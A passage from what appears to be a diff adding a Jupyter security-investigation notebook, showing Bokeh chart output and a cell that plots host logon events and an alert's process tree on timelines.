chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1331\",\"type\":\"Title\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1306\",\"type\":\"PanTool\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"line_width\":2,\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"1406\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"1423\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1389\",\"type\":\"Selection\"},{\"attributes\":{\"formatter\":{\"id\":\"1332\"},\"ticker\":{\"id\":\"1327\"}},\"id\":\"1326\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1438\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1440\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1441\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1326\"},\"ticker\":null},\"id\":\"1329\",\"type\":\"Grid\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1344\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1344\"}]},\"id\":\"1330\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1324\",\"type\":\"LinearScale\"},{\"attributes\":{\"below\":[{\"id\":\"1294\"}],\"center\":[{\"id\":\"1297\"},{\"id\":\"1301\"},{\"id\":\"1375\"},{\"id\":\"1409\"}],\"left\":[{\"id\":\"1298\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"1354\"},{\"id\":\"1380\"},{\"id\":\"1407\"}],\"title\":{\"id\":\"1284\"},\"toolbar\":{\"id\":\"1308\"},\"x_range\":{\"id\":\"1286\"},\"x_scale\":{\"id\":\"1290\"},\"y_range\":{\"id\":\"1288\"},\"y_scale\":{\"id\":\"1292\"}},\"id\":\"1283\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1307\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1443\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1442\",\"type\":\"DaysTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1437\"},{\"id\":\"1438\"},{\"id\":\"1439\"},{\"id\":\"1440\"},{\"id\":\"1441\"},{\"id\":\"1442\"},{\"id\":\"1443\"},{\"id\":\"1444\"},{\"id\":\"1445\"},{\"id\":\"1446\"},{\"id\":\"1447\"},{\"id\":\"1448\"}]},\"id\":\"1327\",\"type\":\"DatetimeTicker\"}],\"root_ids\":[\"1410\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n  var render_items = [{\"docid\":\"6b2bc0ee-4dbd-493b-be91-65ce3abb81f5\",\"root_ids\":[\"1410\"],\"roots\":{\"1410\":\"71b41fee-d723-4d46-9032-8e76bb07a262\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1410"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Column(id='1410', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1410', <span id=\"1640\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='1283', ...), Figure(id='1315', ...)],</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"1639\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1640\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1639\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 11
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "### View Process Session and Logon Events in Timelines\n",
+    "This shows the timeline of the clustered logon events with the process tree obtained earlier. This allows you to get a sense of which logon was responsible for the process tree session whether any additional logons (e.g. creating a process as another user) might be associated with the alert timeline.\n",
+    "\n",
+    "*Note you should use the pan and zoom tools to align the timelines since the data may be over different time ranges.*"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "source": [
+    "# Show timeline of events - all events\n",
+    "nbdisplay.display_timeline(data=clus_logons,\n",
+    "                           source_columns=['Account', 'LogonType'],\n",
+    "                           title='Clustered Host Logons', height=200)\n",
+    "process_tree = pd.read_csv('data/process_tree.csv',\n",
+    "                           parse_dates=[\"TimeGenerated\"],\n",
+    "                           infer_datetime_format=True)\n",
+    "nbdisplay.display_timeline(data=process_tree,\n",
+    "                           title='Alert Process Session', height=200)"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1641\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1641\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1641\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"02234e03-5e58-4026-a1a3-de89c89dc9fd\" data-root-id=\"1712\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"279a3b0a-8aa5-41bb-8a4e-94892c4ea56d\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1644\"},{\"id\":\"1676\"}]},\"id\":\"1712\",\"type\":\"Column\"},{\"attributes\":{\"axis\":{\"id\":\"1659\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1662\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1727\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1742\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1547531220066.45,\"start\":1547514634636.5498},\"id\":\"1679\",\"type\":\"Range1d\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1722\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1741\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1683\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"1701\"},\"x_range\":{\"id\":\"1647\"},\"y_range\":null},\"id\":\"1700\",\"type\":\"RangeTool\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1730\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1681\",\"type\":\"DataRange1d\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1743\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1705\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1685\",\"type\":\"LinearScale\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1663\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1728\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1731\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1653\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1666\",\"type\":\"SaveTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1744\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1642\"},\"glyph\":{\"id\":\"1696\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1697\"},\"selection_glyph\":null,\"view\":{\"id\":\"1699\"}},\"id\":\"1698\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"formatter\":{\"id\":\"1693\"},\"ticker\":{\"id\":\"1688\"}},\"id\":\"1687\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"overlay\":{\"id\":\"1668\"}},\"id\":\"1664\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1651\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1665\",\"type\":\"ResetTool\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1735\"},{\"id\":\"1736\"},{\"id\":\"1737\"},{\"id\":\"1738\"},{\"id\":\"1739\"},{\"id\":\"1740\"},{\"id\":\"1741\"},{\"id\":\"1742\"},{\"id\":\"1743\"},{\"id\":\"1744\"},{\"id\":\"1745\"},{\"id\":\"1746\"}]},\"id\":\"1688\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1732\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1700\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1700\"}]},\"id\":\"1691\",\"type\":\"Toolbar\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1745\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1724\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1736\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"start\":-1.0},\"id\":\"1649\",\"type\":\"Range1d\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1667\",\"type\":\"PanTool\"},{\"attributes\":{\"axis\":{\"id\":\"1687\"},\"ticker\":null},\"id\":\"1690\",\"type\":\"Grid\"},{\"attributes\":{\"end\":1547530582165.3,\"start\":1547515272537.7002},\"id\":\"1647\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1733\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1746\",\"type\":\"YearsTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1738\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Timeline: Clustered Host Logons\"},\"id\":\"1645\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1726\",\"type\":\"DaysTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1722\"},{\"id\":\"1723\"},{\"id\":\"1724\"},{\"id\":\"1725\"},{\"id\":\"1726\"},{\"id\":\"1727\"},{\"id\":\"1728\"},{\"id\":\"1729\"},{\"id\":\"1730\"},{\"id\":\"1731\"},{\"id\":\"1732\"},{\"id\":\"1733\"}]},\"id\":\"1656\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1705\"},\"ticker\":{\"id\":\"1656\"}},\"id\":\"1655\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1697\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1660\",\"type\":\"BasicTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1725\",\"type\":\"DaysTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1735\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1655\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1658\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"1642\"}},\"id\":\"1699\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1737\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1687\"},{\"id\":\"1692\"}],\"center\":[{\"id\":\"1690\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1698\"}],\"title\":{\"id\":\"1677\"},\"toolbar\":{\"id\":\"1691\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1679\"},\"x_scale\":{\"id\":\"1683\"},\"y_range\":{\"id\":\"1681\"},\"y_scale\":{\"id\":\"1685\"}},\"id\":\"1676\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\adm1nistrator\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[3,4,5],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkIAIBxK/IR2QgBAT8nyhHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"index\":[2,0,1],\"y_index\":[0,0,0]},\"selected\":{\"id\":\"1720\"},\"selection_policy\":{\"id\":\"1721\"}},\"id\":\"1642\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1720\",\"type\":\"Selection\"},{\"attributes\":{\"below\":[{\"id\":\"1655\"}],\"center\":[{\"id\":\"1658\"},{\"id\":\"1662\"}],\"left\":[{\"id\":\"1659\"}],\"min_border_left\":50,\"plot_height\":200,\"plot_width\":900,\"renderers\":[{\"id\":\"1710\"}],\"title\":{\"id\":\"1645\"},\"toolbar\":{\"id\":\"1669\"},\"x_range\":{\"id\":\"1647\"},\"x_scale\":{\"id\":\"1651\"},\"y_range\":{\"id\":\"1649\"},\"y_scale\":{\"id\":\"1653\"}},\"id\":\"1644\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main 